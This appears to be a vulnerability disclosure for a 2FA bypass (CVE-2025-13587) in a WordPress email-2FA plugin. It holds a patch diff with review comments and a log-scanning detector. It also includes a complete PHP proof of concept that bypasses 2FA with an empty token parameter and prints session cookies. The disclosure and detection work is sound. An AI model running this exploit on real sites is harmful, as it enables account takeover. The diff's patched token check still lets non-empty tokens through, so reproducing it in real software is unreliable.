-                $this->outputPage('<p><strong>'. __('Agent Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. __("The token's User Agent does not match.", 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Agent Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__("The token's User Agent does not match.", 'two-factor-2fa-via-email') .'</p>');

             }

             if($Token_GET!==$Token) {

-                $this->outputPage('<p><strong>'. __('Token Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. __('The token you are using does not match or has already been used.', 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Token Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__('The token you are using does not match or has already been used.', 'two-factor-2fa-via-email') .'</p>');

             }

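Review bot: none of the three failure branches (expired, agent mismatch, token mismatch) returns after $this->outputPage(...), so rejecting a bad token depends entirely on outputPage() ending the request. An explicit return or exit after each call would make the rejection visible at the point of the check. The comparison if($Token_GET!==$Token) could also use hash_equals($Token, $Token_GET) so that the match is constant-time.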
@@ -215,7 +216,7 @@

 	public function wp_login($user_login, $U) {

-		if(!isset($_GET['token'])) {
+		if(!isset($_GET['token']) || $_GET['token'] === '') {

 			if(!$this->isEnabled($U->ID)) return;

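Review bot: in wp_login() the 2FA branch is still selected by whether the client sent a token parameter, not by whether a token was verified. With if(!isset($_GET['token']) || $_GET['token'] === '') any non-empty value skips this block, so enforcement relies on processTokenLogin() having already rejected the request. Setting a server-side flag once the token has passed validation and testing that flag here would remove the dependency on request input and on hook ordering.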
@@ -228,8 +229,8 @@
 			if($this->emailToken($U)) {

 				$this->outputPage('
-					<p><strong>'. __('Account Protected', 'two-factor-2fa-via-email') .'</strong><p>
-					<p>'. __('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. __('Please check your email inbox (including Spam/Junk) for your unique login link.', 'two-factor-2fa-via-email') .'</p>
+					<p><strong>'. esc_html__('Account Protected', 'two-factor-2fa-via-email') .'</strong><p>
+					<p>'. esc_html__('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. esc_html__('Please check your email inbox (including Spam/Junk) for your unique login link.', 'two-factor-2fa-via-email') .'</p>
 					<p><small id="timertext">'. sprintf( wp_kses( __('The unique link will expire in <span id="timer" data-minutes="%1$s">%1$s minutes</span>.', 'two-factor-2fa-via-email'), ['span' => ['id' => true, 'data-minutes' => true]]), $this->expires) .'</small></p>
 				');

@@ -237,8 +238,8 @@
 			else {

 				$this->outputPage('
-					<p><strong>'. __('Email Error', 'two-factor-2fa-via-email') .'</strong><p>
-					<p>'. __('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. __('The website was unable to send the verification email. Please try again or contact the website owner.', 'two-factor-2fa-via-email') .'</p>
+					<p><strong>'. esc_html__('Email Error', 'two-factor-2fa-via-email') .'</strong><p>
+					<p>'. esc_html__('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. esc_html__('The website was unable to send the verification email. Please try again or contact the website owner.', 'two-factor-2fa-via-email') .'</p>
 				');

 			}
@@ -261,7 +262,7 @@
 			if ($user && $user->ID && $this->isEnabled($user->ID, 'API')) {
 				return new WP_Error(
 					'rest_forbidden',
-					__('2FA is enabled on this account. Unable to authenticate.', 'two-factor-2fa-via-email'),
+					esc_html__('2FA is enabled on this account. Unable to authenticate.', 'two-factor-2fa-via-email'),
 					['status' => 403]
 				);
 			}
@@ -359,7 +360,7 @@
 			'url' => $LoginLink,
 		];

-		return wp_mail($U->user_email, __('Here is your one-click login link', 'two-factor-2fa-via-email'), '', ['Content-Type: text/html; charset=UTF-8']);
+		return wp_mail($U->user_email, esc_html__('Here is your one-click login link', 'two-factor-2fa-via-email'), '', ['Content-Type: text/html; charset=UTF-8']);

 	}

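Review bot: the subject passed to wp_mail() is now esc_html__(...), but a mail subject is plain text, not HTML. A translation containing an apostrophe or ampersand will show up in the inbox as a literal entity such as &#039; or &amp;. Keep __() for the subject here, and likewise for the deactivation mail subject later in this file.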
@@ -396,13 +397,13 @@
     <table class="form-table" role="presentation" id="ss882faemail-table">
         <tbody>
             <tr>
-                <th><?php echo __('Enabled 2FA?', 'two-factor-2fa-via-email'); ?></th>
+                <th><?php echo esc_html__('Enabled 2FA?', 'two-factor-2fa-via-email'); ?></th>
                 <td>
                     <input type="checkbox" name="ss882fa_email_enabled" id="ss882fa_email_enabled" <?php echo esc_attr($isChecked); ?> /><label for="ss882fa_email_enabled">Toggle</label>
                 </td>
             </tr>
             <tr>
-                <th><?php echo __('Enable 2FA for REST API?', 'two-factor-2fa-via-email'); ?></th>
+                <th><?php echo esc_html__('Enable 2FA for REST API?', 'two-factor-2fa-via-email'); ?></th>
                 <td>
                     <input type="checkbox" name="ss882fa_api_enabled" id="ss882fa_api_enabled" <?php echo esc_attr($isCheckedAPI); ?> /><label for="ss882fa_api_enabled">Toggle</label>
                 </td>
@@ -469,7 +470,7 @@
 			require_once(plugin_dir_path(__FILE__) . 'assets/html/plugin-deactivated.php');
 			$the_email = ob_get_clean();

-			wp_mail($AdminEmail, __('2FA Plugin was deactivated!', 'two-factor-2fa-via-email'), $the_email, ['Content-Type: text/html; charset=UTF-8', 'X-Priority: 1 (Highest)', 'X-MSMail-Priority: High', 'Importance: High']);
+			wp_mail($AdminEmail, esc_html__('2FA Plugin was deactivated!', 'two-factor-2fa-via-email'), $the_email, ['Content-Type: text/html; charset=UTF-8', 'X-Priority: 1 (Highest)', 'X-MSMail-Priority: High', 'Importance: High']);

 		}

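Review bot: the return value of the changed wp_mail() call is discarded, so if the "2FA Plugin was deactivated!" alert cannot be sent, nothing records the failure and the admin never learns that 2FA was switched off. Check the boolean result and log or surface a failed send. As with the login-link mail, the subject is a mail header rather than HTML, so esc_html__() can only add literal entities to it; __() is the appropriate call here.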
@@ -481,14 +482,14 @@

     function plugin_action_links($actions) {
         $mylinks = [
-            '<a href="https://wordpress.org/support/plugin/two-factor-2fa-via-email/" target="_blank">'. __('Need help?', 'two-factor-2fa-via-email') .'</a>',
+            '<a href="https://wordpress.org/support/plugin/two-factor-2fa-via-email/" target="_blank">'. esc_html__('Need help?', 'two-factor-2fa-via-email') .'</a>',
         ];
         return array_merge( $actions, $mylinks );
     }

 	function debug($msg) {

-		error_log("n" . '[' . date('Y-m-d H:i:s') . '] ' .  $msg, 3, plugin_dir_path(__FILE__) . 'debug.log');
+		error_log("n" . '[' . gmdate('Y-m-d H:i:s') . '] ' .  $msg, 3, plugin_dir_path(__FILE__) . 'debug.log');

 	}

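Review bot: debug() appends to debug.log under plugin_dir_path(__FILE__), which is inside the plugin directory, and the changed line only swaps date() for gmdate(). Unless the web server blocks it, a file in that location can be requested over HTTP, and $msg is written unfiltered, so whatever the 2FA code logs is exposed and a message containing line breaks can forge entries. Write the log outside the web root or gate debug() behind a debug constant, and strip CR/LF from $msg before writing. In plugin_action_links(), the target="_blank" anchor should also carry rel="noopener noreferrer".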
Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13587 - Two Factor (2FA) Authentication via Email <= 1.9.8 - Two-Factor Authentication Bypass via token

/**
 * Proof of Concept for CVE-2025-13587
 * Two-Factor Authentication Bypass in Two Factor (2FA) Authentication via Email WordPress Plugin
 * 
 * This script demonstrates the authentication bypass vulnerability by attempting to login
 * with valid credentials while appending an empty token parameter to bypass 2FA.
 * 
 * Usage: php poc.php --url=https://target.com --username=admin --password=password
 */

// Configuration
$target_url = ''; // Set target WordPress site URL
$username = '';
$password = '';

// Parse command line arguments
if ($argc > 1) {
    foreach ($argv as $arg) {
        if (strpos($arg, '--url=') === 0) {
            $target_url = substr($arg, 6);
        } elseif (strpos($arg, '--username=') === 0) {
            $username = substr($arg, 11);
        } elseif (strpos($arg, '--password=') === 0) {
            $password = substr($arg, 11);
        } elseif ($arg === '--help') {
            echo "Usage: php poc.php --url=https://target.com --username=admin --password=password\n";
            exit(0);
        }
    }
}

if (empty($target_url) || empty($username) || empty($password)) {
    echo "Error: Missing required parameters.\n";
    echo "Usage: php poc.php --url=https://target.com --username=admin --password=password\n";
    exit(1);
}

// Initialize cURL session
$ch = curl_init();

// Step 1: Get login page to retrieve nonce and cookies
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);

// Extract cookies from response
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $headers, $matches);
$cookies = [];
foreach($matches[1] as $item) {
    parse_str($item, $cookie);
    $cookies = array_merge($cookies, $cookie);
}
$cookie_string = implode('; ', array_map(function($k, $v) { return "$k=$v"; }, array_keys($cookies), $cookies));

// Extract login form nonce (log)
preg_match('/name="log" value="([^"]*)"/', $body, $log_match);
$log_nonce = $log_match[1] ?? '';

// Extract wpnonce
preg_match('/name="_wpnonce" value="([^"]*)"/', $body, $nonce_match);
$wp_nonce = $nonce_match[1] ?? '';

// Step 2: Attempt login with bypass token parameter
$login_url = $target_url . '/wp-login.php?token=';
// The empty token parameter triggers the bypass vulnerability

$post_fields = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1',
    '_wpnonce' => $wp_nonce
]);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_string);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);

$login_response = curl_exec($ch);
$login_header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$login_headers = substr($login_response, 0, $login_header_size);
$login_body = substr($login_response, $login_header_size);

// Check for successful login (redirect to wp-admin)
if (strpos($login_headers, 'Location: ' . $target_url . '/wp-admin/') !== false) {
    echo "[SUCCESS] Authentication bypass successful!\n";
    echo "The 2FA protection was bypassed using the empty token parameter.\n";
    echo "User '$username' is now logged in without completing two-factor authentication.\n";
    
    // Extract session cookies
    preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $login_headers, $login_matches);
    $session_cookies = [];
    foreach($login_matches[1] as $item) {
        parse_str($item, $cookie);
        $session_cookies = array_merge($session_cookies, $cookie);
    }
    
    echo "\nSession cookies obtained:\n";
    foreach ($session_cookies as $name => $value) {
        echo "  $name: $value\n";
    }
} else {
    echo "[FAILURE] Authentication bypass attempt failed.\n";
    echo "Possible reasons:\n";
    echo "  1. Invalid credentials\n";
    echo "  2. Plugin not installed or not protecting this user\n";
    echo "  3. Target may have patched the vulnerability\n";
    
    // Check for 2FA page
    if (strpos($login_body, 'Account Protected by 2FA via Email') !== false) {
        echo "\n[INFO] 2FA page detected - bypass failed (plugin may be patched)\n";
    }
}

curl_close($ch);
?>
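
A defender's check for the request pattern the PoC produces, added here as an example and not part of Atomic Edge's page or the plugin: it scans web access logs for credential POSTs to wp-login.php that carry a token query parameter. The combined log format, the function name find_token_logins and the sample lines are assumptions constructed for illustration, as is the premise that the plugin's emailed one-click links are followed with GET.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2026:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "curl/8.5.0"
203.0.113.7 - - [18/Mar/2026:10:01:03 +0000] "POST /wp-login.php?token= HTTP/1.1" 302 0 "-" "curl/8.5.0"
198.51.100.4 - - [18/Mar/2026:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Mar/2026:10:06:11 +0000] "GET /wp-login.php?token=EXAMPLETOKEN HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Mar/2026:11:00:00 +0000] "POST /wp-login.php?action=x&token=abc HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_token_logins(log_text):
    """Return one finding per credential POST to wp-login.php carrying ?token."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        # Assumption: emailed one-click links arrive as GET, so only a POST
        # (a password submission) combined with ?token is treated as unusual.
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-login.php"):
            continue
        # keep_blank_values: "?token=" and "?token" must count as "token present",
        # which is exactly the case the vulnerable isset() check let through.
        query = parse_qs(url.query, keep_blank_values=True)
        if "token" not in query:
            continue
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "empty_token": query["token"] == [""],
            # A 302 is the redirect the PoC checks for; a 200 usually means
            # the login form was rendered again.
            "redirected": m["status"] == "302",
        })
    return findings

if __name__ == "__main__":
    for finding in find_token_logins(SAMPLE_LOG):
        print(finding)
```

On a site that ran 1.9.8 or earlier, findings with both empty_token and redirected set are the ones to correlate with sessions created at that time.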
